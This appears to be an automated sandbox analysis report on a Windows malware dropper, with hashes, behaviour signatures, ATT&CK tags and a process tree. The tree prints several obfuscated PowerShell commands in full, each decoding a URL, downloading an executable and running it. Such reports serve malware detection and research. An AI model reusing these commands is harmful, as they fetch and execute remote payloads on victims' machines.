a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3

Analysis

max time kernel
150s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
25/06/2022, 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
Size

1.9MB
MD5

b0b47d69cc54b277235b470ba486c710
SHA1

c7f46aba6a3c8b929f322585dc162ae98129221d
SHA256

a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3
SHA512

5565c09d98017f3eb1065bbd1c3d7870a41e29597ed17f39eaebabc4cd1ee7255ef817a15643cc32ededacebfdeee4ebf7bcc5f08cfa55b50c48cf3e40392d9a

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://asdsadasrdc.ug/asdfg.exe

exe.dropper

http://asdsadasrdc.ug/asdfg.exe

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
40	1256	powershell.exe
41	3720	powershell.exe
42	1764	powershell.exe
43	2132	powershell.exe
44	1256	powershell.exe
47	1256	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
5104	_outputcrack.exe
3824	arp.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	_outputcrack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
1376	timeout.exe
4164	timeout.exe
216	timeout.exe
2100	timeout.exe
4440	timeout.exe
4548	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1764	powershell.exe
1256	powershell.exe
3720	powershell.exe
1764	powershell.exe
1256	powershell.exe
3720	powershell.exe
5056	powershell.exe
2132	powershell.exe
5056	powershell.exe
2132	powershell.exe
5024	powershell.exe
5024	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1532 wrote to memory of 2748	1532	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	81
PID 1532 wrote to memory of 2748	1532	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	81
PID 1532 wrote to memory of 2748	1532	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	81
PID 2748 wrote to memory of 5104	2748	cmd.exe	84
PID 2748 wrote to memory of 5104	2748	cmd.exe	84
PID 2748 wrote to memory of 5104	2748	cmd.exe	84
PID 5104 wrote to memory of 3180	5104	_outputcrack.exe	85
PID 5104 wrote to memory of 3180	5104	_outputcrack.exe	85
PID 5104 wrote to memory of 3180	5104	_outputcrack.exe	85
PID 3180 wrote to memory of 4548	3180	cmd.exe	87
PID 3180 wrote to memory of 4548	3180	cmd.exe	87
PID 3180 wrote to memory of 4548	3180	cmd.exe	87
PID 3180 wrote to memory of 4524	3180	cmd.exe	88
PID 3180 wrote to memory of 4524	3180	cmd.exe	88
PID 3180 wrote to memory of 4524	3180	cmd.exe	88
PID 3180 wrote to memory of 1376	3180	cmd.exe	89
PID 3180 wrote to memory of 1376	3180	cmd.exe	89
PID 3180 wrote to memory of 1376	3180	cmd.exe	89
PID 3180 wrote to memory of 4132	3180	cmd.exe	90
PID 3180 wrote to memory of 4132	3180	cmd.exe	90
PID 3180 wrote to memory of 4132	3180	cmd.exe	90
PID 3180 wrote to memory of 4164	3180	cmd.exe	91
PID 3180 wrote to memory of 4164	3180	cmd.exe	91
PID 3180 wrote to memory of 4164	3180	cmd.exe	91
PID 4524 wrote to memory of 1256	4524	mshta.exe	93
PID 4524 wrote to memory of 1256	4524	mshta.exe	93
PID 4524 wrote to memory of 1256	4524	mshta.exe	93
PID 4132 wrote to memory of 1764	4132	mshta.exe	92
PID 4132 wrote to memory of 1764	4132	mshta.exe	92
PID 4132 wrote to memory of 1764	4132	mshta.exe	92
PID 3180 wrote to memory of 208	3180	cmd.exe	96
PID 3180 wrote to memory of 208	3180	cmd.exe	96
PID 3180 wrote to memory of 208	3180	cmd.exe	96
PID 3180 wrote to memory of 216	3180	cmd.exe	97
PID 3180 wrote to memory of 216	3180	cmd.exe	97
PID 3180 wrote to memory of 216	3180	cmd.exe	97
PID 208 wrote to memory of 3720	208	mshta.exe	98
PID 208 wrote to memory of 3720	208	mshta.exe	98
PID 208 wrote to memory of 3720	208	mshta.exe	98
PID 3180 wrote to memory of 5044	3180	cmd.exe	100
PID 3180 wrote to memory of 5044	3180	cmd.exe	100
PID 3180 wrote to memory of 5044	3180	cmd.exe	100
PID 3180 wrote to memory of 2100	3180	cmd.exe	101
PID 3180 wrote to memory of 2100	3180	cmd.exe	101
PID 3180 wrote to memory of 2100	3180	cmd.exe	101
PID 5044 wrote to memory of 5056	5044	mshta.exe	102
PID 5044 wrote to memory of 5056	5044	mshta.exe	102
PID 5044 wrote to memory of 5056	5044	mshta.exe	102
PID 3180 wrote to memory of 5048	3180	cmd.exe	104
PID 3180 wrote to memory of 5048	3180	cmd.exe	104
PID 3180 wrote to memory of 5048	3180	cmd.exe	104
PID 3180 wrote to memory of 4440	3180	cmd.exe	105
PID 3180 wrote to memory of 4440	3180	cmd.exe	105
PID 3180 wrote to memory of 4440	3180	cmd.exe	105
PID 5048 wrote to memory of 2132	5048	mshta.exe	106
PID 5048 wrote to memory of 2132	5048	mshta.exe	106
PID 5048 wrote to memory of 2132	5048	mshta.exe	106
PID 3180 wrote to memory of 3836	3180	cmd.exe	108
PID 3180 wrote to memory of 3836	3180	cmd.exe	108
PID 3180 wrote to memory of 3836	3180	cmd.exe	108
PID 3836 wrote to memory of 5024	3836	mshta.exe	109
PID 3836 wrote to memory of 5024	3836	mshta.exe	109
PID 3836 wrote to memory of 5024	3836	mshta.exe	109
PID 1764 wrote to memory of 3824	1764	powershell.exe	117

C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
"C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\80ED.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe
    _outputcrack.exe
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\50CF.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe"
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3180
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4548
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4524
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wgcxnm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wgcxnm syfpbmd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|syfpbmd;wgcxnm zkfwidtoglep $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2N1dHQubHkvemV5SHF5SA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkfwidtoglep $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1376
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4132
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwlunt $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwlunt tawoxvyelijpum $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tawoxvyelijpum;fwlunt fsqevtxyumpr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2FzZHNhZGFzcmRjLnVnL2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);fsqevtxyumpr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1764
        
        C:\Users\Public\arp.exe
        
        "C:\Users\Public\arp.exe"
        7⤵
        Executes dropped EXE
        
        PID:3824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4164
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:208
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fydir $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fydir bqzfr $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bqzfr;fydir htfdxvgcn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3Rpbnl1cmwuY29tL3kzcDc3dWZl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);htfdxvgcn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 4
        5⤵
        Delays execution with timeout.exe
        
        PID:216
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5044
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL saduxocqtzmby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;saduxocqtzmby imgbedtwlzyok $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|imgbedtwlzyok;saduxocqtzmby evgskhmqljibn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL21hcmFsc2tkcy51Zy9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);evgskhmqljibn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5056
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:2100
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5048
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lnkdvtwhojby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lnkdvtwhojby tehacx $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tehacx;lnkdvtwhojby zkvslpeiwac $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9mYnNjaw==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkvslpeiwac $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 6
        5⤵
        Delays execution with timeout.exe
        
        PID:4440
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3836
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lpyeqrz $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lpyeqrz dpwges $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|dpwges;lpyeqrz ynlpmogafidr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3BhaXBhaXNkdnp4Yy5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ynlpmogafidr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
fb8739a928d4249d6d5e855385ab30a7

SHA1
ee84d14c42c55ea3304fdd56624ef83144fddd2f

SHA256
cefd5e4241cc15681c6e90bae415045807602a9c28939e745a1d649b0888e897

SHA512
af98046f4d25c7fc4b5176f55209ed33868cafa0d2401d0d28186d993780d39b738ea7876bc9ba2ba9516caaae2bc00b1e58ea636aa859bfd9fe1e4b1cf96bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b.hta

Filesize
11KB

MD5
2c81f1d8d202dfaa50534d7401324fce

SHA1
955ec5779d4d4cba14e98ed14fa3f474c36d059a

SHA256
c0b1c6c1380abb47f9fd7ca7728149f0b6a2f56119116b7ad31d1df1678723cd

SHA512
1a84fc615a3829f7feb94558b2afe95c8b43942212dd7deb7b5103ac4a35afbb59da8504692972d8da8b6e744eb78efdf28cfea1df6c9dce5f536149c40916f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CF.tmp\b1.hta

Filesize
11KB

MD5
5cee90fba6052aa18555a5aedb6545a2

SHA1
4dac96e8a4858ef748c4a23dea441c2d0c90737c

SHA256
ab44c1f385c343483d3213ae8c226f9a023ee5803bb07d5a85fb62aa3a0313d8

SHA512
f0715a5611414631dddbe2127a91d67dfb02b2cabd9ee94e20d44ba6354708de45cf8f8f1d617c40901abce0f3609a38255486a7ff9c04ceb46d6b80163d89c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba.hta

Filesize
11KB

MD5
18f43f6d9704d278fb99236cdc439751

SHA1
b652f5ebbd3ef24feee2053203d962600de1e4cf

SHA256
288fb158f4c2d1852349e05215b3352a0fa8fed3efd494ea2fb603cf0bb910b0

SHA512
7fe958edcae3ca1f663c039bb4c0a49a74a141b5d3658ab700c1f7bb2b0e8900e70ef17632ef5febd5052eba4c2a1db1ab57e2d38d4141fcbfc3f260ef451bb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CF.tmp\ba1.hta

Filesize
11KB

MD5
bc293d0abb1e83d4b3efb852ec6cd503

SHA1
57366b64757ec77113ddebc947e18878b0c002ed

SHA256
bfbddae3cd305621b016d235fac7619636609f473ecd9c44925983861bd992aa

SHA512
c842075e53b68f39a548dd1497b2227bcd8ea584b8df1cba74292159ecc65b6ef1a71165e62cad4abb23891acd2938ecf16a4fd97f333c604dace2cd5ed1590a

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m.hta

Filesize
11KB

MD5
87da84d144c0c3de8496f4db7aa43886

SHA1
90ca12c6f24d3fc20f0465a33f1607f3cd23481e

SHA256
fb64afdcb591fd581b8304788911c99ad946e2db79066fc42de120989944bfe0

SHA512
954cfbad14d54f0f1fb1d3528abb21f0800adf77a4b888f93204e78a15670431c425dd340496aa3fe431d60f99d063a1461d1f5589d84ee682764b0357c89368

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CF.tmp\m1.hta

Filesize
11KB
